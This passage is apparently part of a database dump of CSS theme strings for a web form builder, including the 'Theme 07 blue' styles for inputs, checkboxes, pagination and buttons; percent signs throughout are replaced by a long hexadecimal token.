filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/06/date.png) no-repeat left 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 14px;\r\n	height: 13px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\nbox-shadow: 0px 3px 9px 1px rgb(218, 218, 218) inset;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #4C4C4C;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #4C4C4C;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #342114;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 25px 0px 25px;\r\n	font-weight: bold;\r\n	background-color: #90EE90;\r\n	margin-right: 1px;\r\n}\r\n.page_active {\r\n	color: #342114;\r\n	cursor: pointer;\r\n	background-color: #6BD86B;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 20px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 25px 0px 25px;\r\n	margin-right: 1px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	vertical-align: middle;\r\n	background: #72DB72 ;\r\n	background: -moz-linear-gradient(left, #8FEB8F 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #5CF35C 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #72DB72 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #8FEB8F ), color-stop(39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #5CF35C ), color-stop(100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #72DB72 ));\r\n	background: -o-linear-gradient(left, #8FEB8F 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #5CF35C 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #72DB72 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: -ms-linear-gradient(left, #8FEB8F 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #5CF35C 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #72DB72 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: -webkit-linear-gradient(left, #8FEB8F 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #5CF35C 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #72DB72 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\n\r\n}\r\n.page_percentage_deactive {\r\n	height: 23px;\r\n	line-height: 23px;\r\nbackground-color: #E0E0E0;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: left !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #473C34;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #ffffff;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 23px;\r\n	height: 23px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\r\n\r\n.wdform-section-break-div\r\n{\r\nborder-top:1px solid #ABAAAA !important;\r\n}',0),(24,'Theme 07 blue','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #0072A2;\r\nmargin-bottom: 10px;\r\ncolor: #0072A2;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 16px;\r\n	height: 16px;\r\n	top: -6px;\r\n	border: 0px;\r\n	border-radius: 13px;\r\n	background: #A4A4A4;\r\n	border: 1px solid #fff;\r\n	outline: none;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F1F1F1 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #696969;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #0072A2 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #0072A2 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #0072A2 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #0072A2 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #0072A2 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #0072A2 !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #0072A2 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F1F1F1;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/07/01.png) 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 71px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/07/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/07/next.png) no-repeat right #0072A2;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/07/previous.png) no-repeat left #F0EFEF;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border-right: 1px solid #CECECE;\r\n} \r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #0072A2;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #FFFFFF;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #267EA9;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 20px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #267EA9;\r\n	font-size: 20px;\r\nmargin: 16px 0px;\r\n\r\n}\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F1F1F1;\r\nborder: 1px solid transparent;\r\ncolor: #696969;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"] {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ninput[type=\"password\"] {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #A8A8A8;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	color: #0072A2;\r\n	background-color: #ECEBEB;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 25px 0px 25px;\r\n	font-size: 12px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #0072A2;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 18px;\r\n	line-height: 18px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #006C9A; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #0072A2 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00709F 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #006A97 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #0072A2), color-stop(39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00709F), color-stop(100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #006A97)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #0072A2 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00709F 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #006A97 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #0072A2 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00709F 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #006A97 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #0072A2 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00709F 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #006A97 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* IE10+ */\r\n	background: linear-gradient(to right, #0072A2 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00709F 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #006A97 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 18px;\r\n	line-height: 20px;\r\n	background-color: #EBEAEA;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: center!important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_page_navigation:after {\r\n	content: \" \";\r\n	display: block;\r\n	height: 9px;\r\n	background: url([SITE_ROOT]/images/07/0.png) no-repeat;\r\n	position: relative;\r\n	background-size: cover;\r\n	top: -9px;\r\n}\r\n.wdform_percentage_text {\r\n	margin-right:9px;\r\n	color: #FFFFFF;\r\n	font-weight: normal;\r\n	